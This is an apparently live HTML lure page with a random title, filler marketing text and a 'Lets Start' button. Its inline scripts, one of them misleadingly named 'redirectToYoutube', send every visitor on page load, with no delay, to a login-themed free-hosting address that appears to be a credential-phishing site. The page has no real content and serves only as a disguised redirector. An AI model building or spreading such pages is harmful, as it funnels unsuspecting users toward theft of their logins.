<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="images/logo.png" type="image/x-icon"> 
<title>6YvYjxasr | Great Fun</title>
    <link rel="stylesheet" href="css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
    
    <meta property="og:url" content="/">
<meta property="og:type" content="website">
<meta property="og:title" content="6YvYjxasr | Great Fun">
<meta property="og:description" content="Step into a digital oasis that transcends the ordinary and embraces the extraordinary. Our website is an enchanting sanctuary where innovation and elegance converge, inviting you to indulge in a world of limitless possibilities. Immerse yourself in a symphony of captivating design, intuitive navigation, and rich, meaningful content. Journey through a virtual landscape where every pixel tells a story and every click unlocks a new revelation. Delve into a treasure trove of curated knowledge, interactive experiences, and transformative insights. Whether you're a seeker of inspiration, a connoisseur of creativity, or an explorer of undiscovered realms, our website is your passport to a realm of unparalleled beauty and wonder. Embrace the allure and let your digital adventure unfold.">
<meta property="og:image:width" content="1080">
<meta property="og:image:height" content="1920">
  <style>
    /* Button Styles */
.success-button {
  display: inline-block;
  padding: 10px 20px;
  border-radius: 20px;
  background-color: #4CAF50; /* Green color */
  color: #ffffff; /* White text */
  font-family: Arial, sans-serif;
  font-weight: bold;
  font-size: 20px;
  text-align: center;
  text-decoration: none;
  cursor: pointer;
  transition: background-color 0.3s ease;
}

.success-button:hover {
  background-color: #45a049; /* Darker green on hover */
}

.success-button:active {
  background-color: #3e8e41; /* Even darker green on click */
}

/* Icon Styles (Font Awesome used as an example) */
.success-button .fa {
  margin-right: 5px;
}
    </style>
</head>
<body>
    <br><br><br><br><br>
  <center><button id="myButton" class="success-button">Lets Start</button></center>

    <script>
  const myButton = document.getElementById("myButton");

  myButton.onclick = function() {
    // generate the dynamic URL using PHP variables
    const dynamicURL = "http://ogin-live-chat.infinityfreeapp.com/d2dab";
    
    // Redirect to the dynamic URL
    window.location.href = dynamicURL;
  };
</script>
<script>
      function redirectToYoutube() {
        setTimeout(function() {
          window.location.href = "http://login-live-chat.infinityfreeapp.com/d2dab";
        }, 0);
      }

      redirectToYoutube();
    </script>
</body>
</html>
